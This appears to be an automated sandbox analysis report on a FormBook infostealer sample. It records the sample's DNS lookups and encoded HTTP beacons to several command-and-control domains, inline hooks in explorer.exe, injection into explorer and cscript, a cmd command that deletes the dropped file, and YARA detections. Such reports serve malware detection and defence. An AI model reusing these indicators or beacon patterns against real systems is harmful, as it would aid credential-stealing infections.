Jan 26, 2021 16:59:47.445007086 CET	54982	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:47.503876925 CET	53	54982	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:48.435337067 CET	50010	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:48.491889954 CET	53	50010	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:49.027430058 CET	63718	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:49.086314917 CET	53	63718	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:49.512528896 CET	62116	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:49.560516119 CET	53	62116	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:49.687978029 CET	63816	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:49.732337952 CET	55014	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:49.747180939 CET	53	63816	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:49.783117056 CET	53	55014	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:50.231868982 CET	62208	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:50.282481909 CET	53	62208	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:51.278779984 CET	57574	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:51.336147070 CET	53	57574	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:51.915112019 CET	51818	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:51.974304914 CET	53	51818	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:52.664999008 CET	56628	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:52.723587036 CET	53	56628	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:53.605007887 CET	60778	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:53.661519051 CET	53	60778	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:54.538484097 CET	53799	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:54.597676039 CET	53	53799	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:55.061053991 CET	54683	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:55.117429972 CET	53	54683	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:55.668350935 CET	59329	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:55.725994110 CET	53	59329	8.8.8.8	192.168.2.6
Jan 26, 2021 17:00:12.740839005 CET	64021	53	192.168.2.6	8.8.8.8
Jan 26, 2021 17:00:12.807508945 CET	53	64021	8.8.8.8	192.168.2.6
Jan 26, 2021 17:00:28.781791925 CET	56129	53	192.168.2.6	8.8.8.8
Jan 26, 2021 17:00:28.829874039 CET	53	56129	8.8.8.8	192.168.2.6
Jan 26, 2021 17:00:29.233709097 CET	58177	53	192.168.2.6	8.8.8.8
Jan 26, 2021 17:00:29.290179968 CET	53	58177	8.8.8.8	192.168.2.6
Jan 26, 2021 17:00:33.129590034 CET	50700	53	192.168.2.6	8.8.8.8
Jan 26, 2021 17:00:33.187967062 CET	53	50700	8.8.8.8	192.168.2.6
Jan 26, 2021 17:00:33.200325012 CET	54069	53	192.168.2.6	8.8.8.8
Jan 26, 2021 17:00:33.374711037 CET	53	54069	8.8.8.8	192.168.2.6
Jan 26, 2021 17:00:50.817951918 CET	61178	53	192.168.2.6	8.8.8.8
Jan 26, 2021 17:00:50.865824938 CET	53	61178	8.8.8.8	192.168.2.6
Jan 26, 2021 17:00:53.927881002 CET	57017	53	192.168.2.6	8.8.8.8
Jan 26, 2021 17:00:53.988415003 CET	53	57017	8.8.8.8	192.168.2.6
Jan 26, 2021 17:01:37.210289955 CET	56327	53	192.168.2.6	8.8.8.8
Jan 26, 2021 17:01:37.280924082 CET	53	56327	8.8.8.8	192.168.2.6
Jan 26, 2021 17:01:57.442735910 CET	50243	53	192.168.2.6	8.8.8.8
Jan 26, 2021 17:01:57.517740011 CET	53	50243	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 26, 2021 17:00:12.740839005 CET	192.168.2.6	8.8.8.8	0xc8c8	Standard query (0)	www.what3emoji.com	A (IP address)	IN (0x0001)
Jan 26, 2021 17:00:33.200325012 CET	192.168.2.6	8.8.8.8	0x750a	Standard query (0)	www.thehostingroad.com	A (IP address)	IN (0x0001)
Jan 26, 2021 17:00:53.927881002 CET	192.168.2.6	8.8.8.8	0x41dd	Standard query (0)	www.inifinityapps.net	A (IP address)	IN (0x0001)
Jan 26, 2021 17:01:37.210289955 CET	192.168.2.6	8.8.8.8	0x368d	Standard query (0)	www.akealuminum.com	A (IP address)	IN (0x0001)
Jan 26, 2021 17:01:57.442735910 CET	192.168.2.6	8.8.8.8	0xa7fe	Standard query (0)	www.getyoursofa.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 26, 2021 17:00:12.807508945 CET	8.8.8.8	192.168.2.6	0xc8c8	No error (0)	www.what3emoji.com	what3emoji.com		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 17:00:12.807508945 CET	8.8.8.8	192.168.2.6	0xc8c8	No error (0)	what3emoji.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 26, 2021 17:00:33.374711037 CET	8.8.8.8	192.168.2.6	0x750a	No error (0)	www.thehostingroad.com	thehostingroad.com		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 17:00:33.374711037 CET	8.8.8.8	192.168.2.6	0x750a	No error (0)	thehostingroad.com		68.183.162.131	A (IP address)	IN (0x0001)
Jan 26, 2021 17:00:53.988415003 CET	8.8.8.8	192.168.2.6	0x41dd	No error (0)	www.inifinityapps.net	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 17:00:53.988415003 CET	8.8.8.8	192.168.2.6	0x41dd	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Jan 26, 2021 17:00:53.988415003 CET	8.8.8.8	192.168.2.6	0x41dd	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Jan 26, 2021 17:00:53.988415003 CET	8.8.8.8	192.168.2.6	0x41dd	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Jan 26, 2021 17:00:53.988415003 CET	8.8.8.8	192.168.2.6	0x41dd	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Jan 26, 2021 17:00:53.988415003 CET	8.8.8.8	192.168.2.6	0x41dd	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Jan 26, 2021 17:00:53.988415003 CET	8.8.8.8	192.168.2.6	0x41dd	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Jan 26, 2021 17:00:53.988415003 CET	8.8.8.8	192.168.2.6	0x41dd	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Jan 26, 2021 17:01:37.280924082 CET	8.8.8.8	192.168.2.6	0x368d	Server failure (2)	www.akealuminum.com	none	none	A (IP address)	IN (0x0001)
Jan 26, 2021 17:01:57.517740011 CET	8.8.8.8	192.168.2.6	0xa7fe	No error (0)	www.getyoursofa.com		162.241.30.16	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.what3emoji.com

www.thehostingroad.com

www.inifinityapps.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49750	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 17:00:12.857362032 CET	5589	OUT	GET /bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV HTTP/1.1 Host: www.what3emoji.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 26, 2021 17:00:12.996208906 CET	5589	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 26 Jan 2021 16:00:12 GMT Content-Type: text/html Content-Length: 275 ETag: "600b4d46-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49756	68.183.162.131	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 17:00:33.572993994 CET	5614	OUT	GET /bf3/?pPX=l8I6XPguYKFPGKeVh8gT1y9i2fKE+hPHZakSNaciRtP7EZ8w/BzDNNldYjt/uExn0X1icGC4Ug==&W6=jnKpRl-xV HTTP/1.1 Host: www.thehostingroad.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 26, 2021 17:00:33.769351959 CET	5616	IN	HTTP/1.1 302 Found Connection: close Content-Type: text/html Content-Length: 682 Date: Tue, 26 Jan 2021 16:00:33 GMT Server: LiteSpeed Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Location: http://www.thehostingroad.com/cgi-sys/suspendedpage.cgi?pPX=l8I6XPguYKFPGKeVh8gT1y9i2fKE+hPHZakSNaciRtP7EZ8w/BzDNNldYjt/uExn0X1icGC4Ug==&W6=jnKpRl-xV Vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 32 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49758	198.54.117.215	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 17:00:54.182765007 CET	5628	OUT	GET /bf3/?pPX=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2hInTt8ZuQ329MgbQ==&W6=jnKpRl-xV HTTP/1.1 Host: www.inifinityapps.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEA
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEA
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEA
GetMessageA	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEA

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: bXFjrxjRlb.exe PID: 1212 Parent PID: 5976

General

Start time:	16:59:04
Start date:	26/01/2021
Path:	C:\Users\user\Desktop\bXFjrxjRlb.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\bXFjrxjRlb.exe'
Imagebase:	0x110000
File size:	772608 bytes
MD5 hash:	4A595C5540F0A097A5F11159CDF5C015
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: AddInProcess32.exe PID: 6460 Parent PID: 1212

General

Start time:	16:59:11
Start date:	26/01/2021
Path:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Imagebase:	0x9e0000
File size:	42080 bytes
MD5 hash:	F2A47587431C466535F3C3D3427724BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3440 Parent PID: 6460

General

Start time:	16:59:21
Start date:	26/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6f22f0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cscript.exe PID: 3684 Parent PID: 3440

General

Start time:	16:59:33
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cscript.exe
Imagebase:	0x1190000
File size:	143360 bytes
MD5 hash:	00D3041E47F99E48DD5FFFEDF60F6304
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6932 Parent PID: 3684

General

Start time:	16:59:37
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6940 Parent PID: 6932

General

Start time:	16:59:38
Start date:	26/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: bXFjrxjRlb.exe PID: 1212 Parent PID: 5976 bXFjrxjRlb.exeCOMMON

Executed Functions

Function 069C0788, Relevance: 4.7, Strings: 3, Instructions: 974COMMON

Download Yara Rule

Strings

ntin, xrefs: 069C0CB5
ntin, xrefs: 069C11E7
<, xrefs: 069C09A4

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID: <$ntin$ntin
API String ID: 0-1029651476
Opcode ID: bd4d389ca06f7fa860b3d02ada966bef0d7e53fdf51ae3ac885d088d4bbf9c7d
Instruction ID: df1cf9af391c792cfec432040dd622bd3c2b83973d56848076b5894fd3f8e87f
Opcode Fuzzy Hash: bd4d389ca06f7fa860b3d02ada966bef0d7e53fdf51ae3ac885d088d4bbf9c7d
Instruction Fuzzy Hash: 60A2E374E04219CFDB54CF99C981A9DBBF2BF89310F24C0A9D508AB656DB30AD81CF65

Uniqueness

Uniqueness Score: -1.00%

Function 069C0778, Relevance: 4.1, Strings: 3, Instructions: 309COMMON

Download Yara Rule

Strings

ntin, xrefs: 069C0A8B
ntin, xrefs: 069C0CB5
<, xrefs: 069C09A4

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID: <$ntin$ntin
API String ID: 0-1029651476
Opcode ID: 95a05bdf4a06f8b9c1ff3238509b8d3e6c72e5e8cc76aa0a47a58330b509d2b8
Instruction ID: 1adf2cf8fa6f89eebd06f60c65f548ba0cf4c0a85927f9962a278282f052a9b5
Opcode Fuzzy Hash: 95a05bdf4a06f8b9c1ff3238509b8d3e6c72e5e8cc76aa0a47a58330b509d2b8
Instruction Fuzzy Hash: FFE1B3B5E006188FDB58CFAAC981ADEBBF2BF88310F14C0A9D518AB365DB345941CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00B7C9A8, Relevance: 3.2, Strings: 2, Instructions: 653COMMON

Download Yara Rule

Strings

<, xrefs: 00B7CADD
@, xrefs: 00B7D2BD

Memory Dump Source

Source File: 00000000.00000002.356116837.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID: <$@
API String ID: 0-1426351568
Opcode ID: 43780c9b69972971f5ebe8f085ff7e515e79e3a4bd8b4cc06267d2e5b84b90f8
Instruction ID: 75f978b326cfd687620200e541b0424968b00231dddceffc79b46681c231630c
Opcode Fuzzy Hash: 43780c9b69972971f5ebe8f085ff7e515e79e3a4bd8b4cc06267d2e5b84b90f8
Instruction Fuzzy Hash: 74629B74A00219CFDB64DFA9CA80A9DFBF2FF49715F25C1A9D518AB212D730A981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B79F20, Relevance: .9, Instructions: 897COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356116837.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 894ce607fbe1a981200ec3a23a3e9cf1568687c0bfe1a6f721d781ea89045075
Instruction ID: adf84521e0b046ca9a567d6ca1d1e36a1d75e1569aae632b376359d486015257
Opcode Fuzzy Hash: 894ce607fbe1a981200ec3a23a3e9cf1568687c0bfe1a6f721d781ea89045075
Instruction Fuzzy Hash: BA829030A04209DFCB55CF68C884AAEBBF1FF88314F15C5A9E5299B261D730ED51CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B767E8, Relevance: .5, Instructions: 513COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356116837.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28a3d190ffe37ff4d7586f32fa318a468e4778112072f0201401540438be4fe8
Instruction ID: c235155843160ae3ded393cf5fad52c0bd0c81cf90b40255b9326eb009b34f0c
Opcode Fuzzy Hash: 28a3d190ffe37ff4d7586f32fa318a468e4778112072f0201401540438be4fe8
Instruction Fuzzy Hash: E5129F70A006198FDB14DF64C994AAEBBF2FF89304F14C169E51AEB395EB309D41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B7EBD2, Relevance: .5, Instructions: 509COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356116837.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 484ce7c0a9cbeb9ca6036bd9db3120e48f6e68bb5f38f09c9c3b9b570a73c82c
Instruction ID: d7e37785dd14b408e36b0e265abd1a734e7d8b5499545650cdfca3b77307cdbc
Opcode Fuzzy Hash: 484ce7c0a9cbeb9ca6036bd9db3120e48f6e68bb5f38f09c9c3b9b570a73c82c
Instruction Fuzzy Hash: CB428D74A05229CFDB64CFA9C984B9DBBB2FF48310F1181A9E819A7355D734AE81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B7D4A2, Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356116837.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f464e2760741a9258305ab3facbb77ed9b8f127f67d2cef65ade3192619a808e
Instruction ID: 906a3813d819f1a5817c2a7767e4c49b4477860a8f0a8f67194730c21ef5b644
Opcode Fuzzy Hash: f464e2760741a9258305ab3facbb77ed9b8f127f67d2cef65ade3192619a808e
Instruction Fuzzy Hash: 5C32BF709002198FDB54DBA9CA80A8DFBF2FF49B55F65C1A9C51CAB212CB30D985CF61

Uniqueness

Uniqueness Score: -1.00%

Function 069C1F91, Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c675102997003e31fb8a0bd09d170602c294d6446e2df622ba855f91f208382b
Instruction ID: 636ab4bff1b8ac5cdd40a3bb4df0c15fbbec1bee3e88f16af58f4b67162e7af6
Opcode Fuzzy Hash: c675102997003e31fb8a0bd09d170602c294d6446e2df622ba855f91f208382b
Instruction Fuzzy Hash: 0D22DF74D05268CFDB68DF65D854BADBBB2FF4A305F1080AAD409A7294DB389E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00B76E20, Relevance: .4, Instructions: 441COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356116837.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cffae9f152c185ed4cbbfb723eaf9daa0ac6ef9fc8427b9608b7b987730a4c58
